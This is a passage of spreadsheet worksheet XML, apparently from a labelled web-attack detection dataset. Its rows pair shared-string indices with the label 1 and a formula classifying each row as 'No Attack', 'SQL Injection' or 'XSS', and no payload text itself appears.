      </c>
      <c r="B17904">
        <v>1</v>
      </c>
      <c r="C17904" s="7" t="str">
        <f t="shared" si="279"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17905" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A17905" s="1" t="s">
        <v>18177</v>
      </c>
      <c r="B17905">
        <v>1</v>
      </c>
      <c r="C17905" s="7" t="str">
        <f t="shared" si="279"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17906" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17906" s="1" t="s">
        <v>25162</v>
      </c>
      <c r="B17906">
        <v>1</v>
      </c>
      <c r="C17906" s="7" t="str">
        <f t="shared" si="279"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17907" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A17907" s="1" t="s">
        <v>19563</v>
      </c>
      <c r="B17907">
        <v>1</v>
      </c>
      <c r="C17907" s="7" t="str">
        <f t="shared" si="279"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17908" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A17908" s="1" t="s">
        <v>12931</v>
      </c>
      <c r="B17908">
        <v>1</v>
      </c>
      <c r="C17908" s="7" t="str">
        <f t="shared" si="279"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17909" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17909" s="1" t="s">
        <v>14195</v>
      </c>
      <c r="B17909">
        <v>1</v>
      </c>
      <c r="C17909" s="7" t="str">
        <f t="shared" si="279"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17910" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A17910" s="1" t="s">
        <v>12836</v>
      </c>
      <c r="B17910">
        <v>1</v>
      </c>
      <c r="C17910" s="7" t="str">
        <f t="shared" si="279"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17911" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A17911" s="1" t="s">
        <v>16087</v>
      </c>
      <c r="B17911">
        <v>1</v>
      </c>
      <c r="C17911" s="7" t="str">
        <f t="shared" si="279"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17912" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17912" s="1" t="s">
        <v>13057</v>
      </c>
      <c r="B17912">
        <v>1</v>
      </c>
      <c r="C17912" s="7" t="str">
        <f t="shared" si="279"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17913" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17913" s="1" t="s">
        <v>13928</v>
      </c>
      <c r="B17913">
        <v>1</v>
      </c>
      <c r="C17913" s="7" t="str">
        <f t="shared" si="279"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17914" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17914" s="1" t="s">
        <v>14779</v>
      </c>
      <c r="B17914">
        <v>1</v>
      </c>
      <c r="C17914" s="7" t="str">
        <f t="shared" si="279"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17915" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17915" s="1" t="s">
        <v>12092</v>
      </c>
      <c r="B17915">
        <v>1</v>
      </c>
      <c r="C17915" s="7" t="str">
        <f t="shared" si="279"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17916" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A17916" s="1" t="s">
        <v>24511</v>
      </c>
      <c r="B17916">
        <v>1</v>
      </c>
      <c r="C17916" s="7" t="str">
        <f t="shared" si="279"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17917" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A17917" s="1" t="s">
        <v>12531</v>
      </c>
      <c r="B17917">
        <v>1</v>
      </c>
      <c r="C17917" s="7" t="str">
        <f t="shared" si="279"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17918" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17918" s="1" t="s">
        <v>26051</v>
      </c>
      <c r="B17918">
        <v>1</v>
      </c>
      <c r="C17918" s="7" t="str">
        <f t="shared" si="279"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17919" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17919" s="1" t="s">
        <v>26098</v>
      </c>
      <c r="B17919">
        <v>1</v>
      </c>
      <c r="C17919" s="7" t="str">
        <f t="shared" si="279"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17920" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17920" s="1" t="s">
        <v>12369</v>
      </c>
      <c r="B17920">
        <v>1</v>
      </c>
      <c r="C17920" s="7" t="str">
        <f t="shared" si="279"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17921" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17921" s="1" t="s">
        <v>14841</v>
      </c>
      <c r="B17921">
        <v>1</v>
      </c>
      <c r="C17921" s="7" t="str">
        <f t="shared" si="279"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17922" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A17922" s="1" t="s">
        <v>16592</v>
      </c>
      <c r="B17922">
        <v>1</v>
      </c>
      <c r="C17922" s="7" t="str">
        <f t="shared" si="279"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17923" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17923" s="1" t="s">
        <v>17965</v>
      </c>
      <c r="B17923">
        <v>1</v>
      </c>
      <c r="C17923" s="7" t="str">
        <f t="shared" ref="C17923:C17986" si="280">IF(B17923=0,"No Attack", IF(B17923=1, "SQL Injection", "XSS") )</f>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17924" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17924" s="1" t="s">
        <v>13519</v>
      </c>
      <c r="B17924">
        <v>1</v>
      </c>
      <c r="C17924" s="7" t="str">
        <f t="shared" si="280"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17925" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17925" s="1" t="s">
        <v>17902</v>
      </c>
      <c r="B17925">
        <v>1</v>
      </c>
      <c r="C17925" s="7" t="str">
        <f t="shared" si="280"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17926" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17926" s="1" t="s">
        <v>19438</v>
      </c>
      <c r="B17926">
        <v>1</v>
      </c>
      <c r="C17926" s="7" t="str">
        <f t="shared" si="280"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17927" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A17927" s="1" t="s">
        <v>16850</v>
      </c>
      <c r="B17927">
        <v>1</v>
      </c>
      <c r="C17927" s="7" t="str">
        <f t="shared" si="280"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17928" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A17928" s="1" t="s">
        <v>17795</v>
      </c>
      <c r="B17928">
        <v>1</v>
      </c>
      <c r="C17928" s="7" t="str">
        <f t="shared" si="280"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17929" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17929" s="1" t="s">
        <v>15793</v>
      </c>
      <c r="B17929">
        <v>1</v>
      </c>
      <c r="C17929" s="7" t="str">
        <f t="shared" si="280"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17930" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A17930" s="1" t="s">
        <v>16070</v>
      </c>
      <c r="B17930">
        <v>1</v>
      </c>
      <c r="C17930" s="7" t="str">
        <f t="shared" si="280"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17931" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A17931" s="1" t="s">
        <v>18065</v>
      </c>
      <c r="B17931">
        <v>1</v>
      </c>
      <c r="C17931" s="7" t="str">
        <f t="shared" si="280"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17932" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17932" s="1" t="s">
        <v>26364</v>
      </c>
      <c r="B17932">
        <v>1</v>
      </c>
      <c r="C17932" s="7" t="str">
        <f t="shared" si="280"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17933" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17933" s="1" t="s">
        <v>19351</v>
      </c>
      <c r="B17933">
        <v>1</v>
      </c>
      <c r="C17933" s="7" t="str">
        <f t="shared" si="280"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17934" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A17934" s="1" t="s">
        <v>18257</v>
      </c>
      <c r="B17934">
        <v>1</v>
      </c>
      <c r="C17934" s="7" t="str">
        <f t="shared" si="280"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17935" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17935" s="1" t="s">
        <v>13100</v>
      </c>
      <c r="B17935">
        <v>1</v>
      </c>
      <c r="C17935" s="7" t="str">
        <f t="shared" si="280"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17936" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17936" s="1" t="s">
        <v>25384</v>
      </c>
      <c r="B17936">
        <v>1</v>
      </c>
      <c r="C17936" s="7" t="str">
        <f t="shared" si="280"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17937" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17937" s="1" t="s">
        <v>26569</v>
      </c>
      <c r="B17937">
        <v>1</v>
      </c>
      <c r="C17937" s="7" t="str">
        <f t="shared" si="280"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17938" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17938" s="1" t="s">
        <v>12920</v>
      </c>
      <c r="B17938">
        <v>1</v>
      </c>
      <c r="C17938" s="7" t="str">
        <f t="shared" si="280"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17939" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17939" s="1" t="s">
        <v>15312</v>
      </c>
      <c r="B17939">
        <v>1</v>
      </c>
      <c r="C17939" s="7" t="str">
        <f t="shared" si="280"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17940" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17940" s="1" t="s">
        <v>19826</v>
      </c>
      <c r="B17940">
        <v>1</v>
      </c>
      <c r="C17940" s="7" t="str">
        <f t="shared" si="280"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17941" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A17941" s="1" t="s">
        <v>25489</v>
      </c>
      <c r="B17941">
        <v>1</v>
      </c>
      <c r="C17941" s="7" t="str">
        <f t="shared" si="280"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17942" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17942" s="1" t="s">
        <v>15991</v>
      </c>
      <c r="B17942">
        <v>1</v>
      </c>
      <c r="C17942" s="7" t="str">
        <f t="shared" si="280"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17943" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17943" s="1" t="s">
        <v>16001</v>
      </c>
      <c r="B17943">
        <v>1</v>
      </c>
      <c r="C17943" s="7" t="str">
        <f t="shared" si="280"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17944" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17944" s="1" t="s">
        <v>15077</v>
      </c>
      <c r="B17944">
        <v>1</v>
      </c>
      <c r="C17944" s="7" t="str">
        <f t="shared" si="280"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17945" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17945" s="1" t="s">
        <v>26081</v>
      </c>
      <c r="B17945">
        <v>1</v>
      </c>
      <c r="C17945" s="7" t="str">
        <f t="shared" si="280"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17946" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17946" s="1" t="s">
        <v>25494</v>
      </c>
      <c r="B17946">
        <v>1</v>
      </c>
      <c r="C17946" s="7" t="str">
        <f t="shared" si="280"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17947" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17947" s="1" t="s">
        <v>12963</v>
      </c>
      <c r="B17947">
        <v>1</v>
      </c>
      <c r="C17947" s="7" t="str">
        <f t="shared" si="280"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17948" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17948" s="1" t="s">
        <v>16394</v>
      </c>
      <c r="B17948">
        <v>1</v>
      </c>
      <c r="C17948" s="7" t="str">
        <f t="shared" si="280"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17949" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17949" s="1" t="s">
        <v>19051</v>
      </c>
      <c r="B17949">
        <v>1</v>
      </c>
      <c r="C17949" s="7" t="str">
        <f t="shared" si="280"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17950" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17950" s="1" t="s">
        <v>26368</v>
      </c>
      <c r="B17950">
        <v>1</v>
      </c>
      <c r="C17950" s="7" t="str">
        <f t="shared" si="280"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17951" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17951" s="1" t="s">
        <v>15750</v>
      </c>
      <c r="B17951">
        <v>1</v>
      </c>
      <c r="C17951" s="7" t="str">
        <f t="shared" si="280"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17952" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17952" s="1" t="s">
        <v>14258</v>
      </c>
      <c r="B17952">
        <v>1</v>
      </c>
      <c r="C17952" s="7" t="str">
        <f t="shared" si="280"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17953" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17953" s="1" t="s">
        <v>13964</v>
      </c>
      <c r="B17953">
        <v>1</v>
      </c>
      <c r="C17953" s="7" t="str">
        <f t="shared" si="280"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17954" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17954" s="1" t="s">
        <v>26481</v>
      </c>
      <c r="B17954">
        <v>1</v>
      </c>
      <c r="C17954" s="7" t="str">
        <f t="shared" si="280"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17955" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17955" s="1" t="s">
        <v>17059</v>
      </c>
      <c r="B17955">
        <v>1</v>
      </c>
      <c r="C17955" s="7" t="str">
        <f t="shared" si="280"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17956" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17956" s="1" t="s">
        <v>14509</v>
      </c>
      <c r="B17956">
        <v>1</v>
      </c>
      <c r="C17956" s="7" t="str">
        <f t="shared" si="280"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17957" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17957" s="1" t="s">
        <v>17572</v>
      </c>
      <c r="B17957">
        <v>1</v>
      </c>
      <c r="C17957" s="7" t="str">
        <f t="shared" si="280"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17958" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17958" s="1" t="s">
        <v>13740</v>
      </c>
      <c r="B17958">
        <v>1</v>
      </c>
      <c r="C17958" s="7" t="str">
        <f t="shared" si="280"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17959" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17959" s="1" t="s">
        <v>13658</v>
      </c>
      <c r="B17959">
        <v>1</v>
      </c>
      <c r="C17959" s="7" t="str">
        <f t="shared" si="280"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17960" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17960" s="1" t="s">
        <v>26721</v>
      </c>
      <c r="B17960">
        <v>1</v>
      </c>
      <c r="C17960" s="7" t="str">
        <f t="shared" si="280"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17961" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17961" s="1" t="s">
        <v>12216</v>
      </c>
      <c r="B17961">
        <v>1</v>
      </c>
      <c r="C17961" s="7" t="str">
        <f t="shared" si="280"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17962" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17962" s="1" t="s">
        <v>16173</v>
      </c>
      <c r="B17962">
        <v>1</v>
      </c>
      <c r="C17962" s="7" t="str">
        <f t="shared" si="280"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17963" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17963" s="1" t="s">
        <v>25609</v>
      </c>
      <c r="B17963">
        <v>1</v>
      </c>
      <c r="C17963" s="7" t="str">
        <f t="shared" si="280"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17964" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17964" s="1" t="s">
        <v>13988</v>
      </c>
      <c r="B17964">
        <v>1</v>
      </c>
      <c r="C17964" s="7" t="str">
        <f t="shared" si="280"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17965" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17965" s="1" t="s">
        <v>16029</v>
      </c>
      <c r="B17965">
        <v>1</v>
      </c>
      <c r="C17965" s="7" t="str">
        <f t="shared" si="280"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17966" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A17966" s="1" t="s">
        <v>12265</v>
      </c>
      <c r="B17966">
        <v>1</v>
      </c>
      <c r="C17966" s="7" t="str">
        <f t="shared" si="280"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17967" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17967" s="1" t="s">
        <v>14159</v>
      </c>
      <c r="B17967">
        <v>1</v>
      </c>
      <c r="C17967" s="7" t="str">
        <f t="shared" si="280"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17968" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17968" s="1" t="s">
        <v>17010</v>
      </c>
      <c r="B17968">
        <v>1</v>
      </c>
      <c r="C17968" s="7" t="str">
        <f t="shared" si="280"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17969" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17969" s="1" t="s">
        <v>15409</v>
      </c>
      <c r="B17969">
        <v>1</v>
      </c>
      <c r="C17969" s="7" t="str">
        <f t="shared" si="280"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17970" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17970" s="1" t="s">
        <v>13753</v>
      </c>
      <c r="B17970">
        <v>1</v>
      </c>
      <c r="C17970" s="7" t="str">
        <f t="shared" si="280"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17971" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17971" s="1" t="s">
        <v>15145</v>
      </c>
      <c r="B17971">
        <v>1</v>
      </c>
      <c r="C17971" s="7" t="str">
        <f t="shared" si="280"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17972" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17972" s="1" t="s">
        <v>12661</v>
      </c>
      <c r="B17972">
        <v>1</v>
      </c>
      <c r="C17972" s="7" t="str">
        <f t="shared" si="280"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17973" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A17973" s="1" t="s">
        <v>15416</v>
      </c>
      <c r="B17973">
        <v>1</v>
      </c>
      <c r="C17973" s="7" t="str">
        <f t="shared" si="280"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17974" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17974" s="1" t="s">
        <v>19278</v>
      </c>
      <c r="B17974">
        <v>1</v>
      </c>
      <c r="C17974" s="7" t="str">
        <f t="shared" si="280"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17975" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17975" s="1" t="s">
        <v>24643</v>
      </c>
      <c r="B17975">
        <v>1</v>
      </c>
      <c r="C17975" s="7" t="str">
        <f t="shared" si="280"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17976" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17976" s="1" t="s">
        <v>26756</v>
      </c>
      <c r="B17976">
        <v>1</v>
      </c>
      <c r="C17976" s="7" t="str">
        <f t="shared" si="280"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17977" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17977" s="1" t="s">
        <v>26730</v>
      </c>
      <c r="B17977">
        <v>1</v>
      </c>
      <c r="C17977" s="7" t="str">
        <f t="shared" si="280"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17978" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17978" s="1" t="s">
        <v>26417</v>
      </c>
      <c r="B17978">
        <v>1</v>
      </c>
      <c r="C17978" s="7" t="str">
        <f t="shared" si="280"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17979" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17979" s="1" t="s">
        <v>19286</v>
      </c>
      <c r="B17979">
        <v>1</v>
      </c>
      <c r="C17979" s="7" t="str">
        <f t="shared" si="280"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17980" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17980" s="1" t="s">
        <v>12198</v>
      </c>
      <c r="B17980">
        <v>1</v>
      </c>
      <c r="C17980" s="7" t="str">
        <f t="shared" si="280"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17981" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17981" s="1" t="s">
        <v>16410</v>
      </c>
      <c r="B17981">
        <v>1</v>
      </c>
      <c r="C17981" s="7" t="str">
        <f t="shared" si="280"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17982" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17982" s="1" t="s">
        <v>26023</v>
      </c>
      <c r="B17982">
        <v>1</v>
      </c>
      <c r="C17982" s="7" t="str">
        <f t="shared" si="280"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17983" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17983" s="1" t="s">
        <v>15560</v>
      </c>
      <c r="B17983">
        <v>1</v>
      </c>
      <c r="C17983" s="7" t="str">
        <f t="shared" si="280"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17984" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17984" s="1" t="s">
        <v>17114</v>
      </c>
      <c r="B17984">
        <v>1</v>
      </c>
      <c r="C17984" s="7" t="str">
        <f t="shared" si="280"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17985" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17985" s="1" t="s">
        <v>26124</v>
      </c>
      <c r="B17985">
        <v>1</v>
      </c>
      <c r="C17985" s="7" t="str">
        <f t="shared" si="280"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17986" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17986" s="1" t="s">
        <v>25184</v>
      </c>
      <c r="B17986">
        <v>1</v>
      </c>
      <c r="C17986" s="7" t="str">
        <f t="shared" si="280"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17987" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17987" s="1" t="s">
        <v>12814</v>
      </c>
      <c r="B17987">
        <v>1</v>
      </c>
      <c r="C17987" s="7" t="str">
        <f t="shared" ref="C17987:C18050" si="281">IF(B17987=0,"No Attack", IF(B17987=1, "SQL Injection", "XSS") )</f>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17988" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17988" s="1" t="s">
        <v>24428</v>
      </c>
      <c r="B17988">
        <v>1</v>
      </c>
      <c r="C17988" s="7" t="str">
        <f t="shared" si="281"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17989" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17989" s="1" t="s">
        <v>12134</v>
      </c>
      <c r="B17989">
        <v>1</v>
      </c>
      <c r="C17989" s="7" t="str">
        <f t="shared" si="281"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17990" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17990" s="1" t="s">
        <v>13716</v>
      </c>
      <c r="B17990">
        <v>1</v>
      </c>
      <c r="C17990" s="7" t="str">
        <f t="shared" si="281"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17991" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17991" s="1" t="s">
        <v>17519</v>
      </c>
      <c r="B17991">
        <v>1</v>
      </c>
      <c r="C17991" s="7" t="str">
        <f t="shared" si="281"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17992" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17992" s="1" t="s">
        <v>19835</v>
      </c>
      <c r="B17992">
        <v>1</v>
      </c>
      <c r="C17992" s="7" t="str">
        <f t="shared" si="281"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17993" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17993" s="1" t="s">
        <v>16738</v>
      </c>
      <c r="B17993">
        <v>1</v>
      </c>
      <c r="C17993" s="7" t="str">
        <f t="shared" si="281"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17994" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17994" s="1" t="s">
        <v>25396</v>
      </c>
      <c r="B17994">
        <v>1</v>
      </c>
      <c r="C17994" s="7" t="str">
        <f t="shared" si="281"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17995" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17995" s="1" t="s">
        <v>26316</v>
      </c>
      <c r="B17995">
        <v>1</v>
      </c>
      <c r="C17995" s="7" t="str">
        <f t="shared" si="281"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17996" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17996" s="1" t="s">
        <v>19367</v>
      </c>
      <c r="B17996">
        <v>1</v>
      </c>
      <c r="C17996" s="7" t="str">
        <f t="shared" si="281"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17997" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17997" s="1" t="s">
        <v>26708</v>
      </c>
      <c r="B17997">
        <v>1</v>
      </c>
      <c r="C17997" s="7" t="str">
        <f t="shared" si="281"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17998" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17998" s="1" t="s">
        <v>16116</v>
      </c>
      <c r="B17998">
        <v>1</v>
      </c>
      <c r="C17998" s="7" t="str">
        <f t="shared" si="281"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17999" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17999" s="1" t="s">
        <v>17027</v>
      </c>
      <c r="B17999">
        <v>1</v>
      </c>
      <c r="C17999" s="7" t="str">
        <f t="shared" si="281"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18000" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18000" s="1" t="s">
        <v>13947</v>
      </c>
      <c r="B18000">
        <v>1</v>
      </c>
      <c r="C18000" s="7" t="str">
        <f t="shared" si="281"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18001" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18001" s="1" t="s">
        <v>25243</v>
      </c>
      <c r="B18001">
        <v>1</v>
      </c>
      <c r="C18001" s="7" t="str">
        <f t="shared" si="281"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18002" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A18002" s="1" t="s">
        <v>16295</v>
      </c>
      <c r="B18002">
        <v>1</v>
      </c>
      <c r="C18002" s="7" t="str">
        <f t="shared" si="281"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18003" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18003" s="1" t="s">
        <v>17020</v>
      </c>
      <c r="B18003">
        <v>1</v>
      </c>
      <c r="C18003" s="7" t="str">
        <f t="shared" si="281"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18004" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18004" s="1" t="s">
        <v>26144</v>
      </c>
      <c r="B18004">
        <v>1</v>
      </c>
      <c r="C18004" s="7" t="str">
        <f t="shared" si="281"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18005" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18005" s="1" t="s">
        <v>16526</v>
      </c>
      <c r="B18005">
        <v>1</v>
      </c>
      <c r="C18005" s="7" t="str">
        <f t="shared" si="281"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18006" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18006" s="1" t="s">
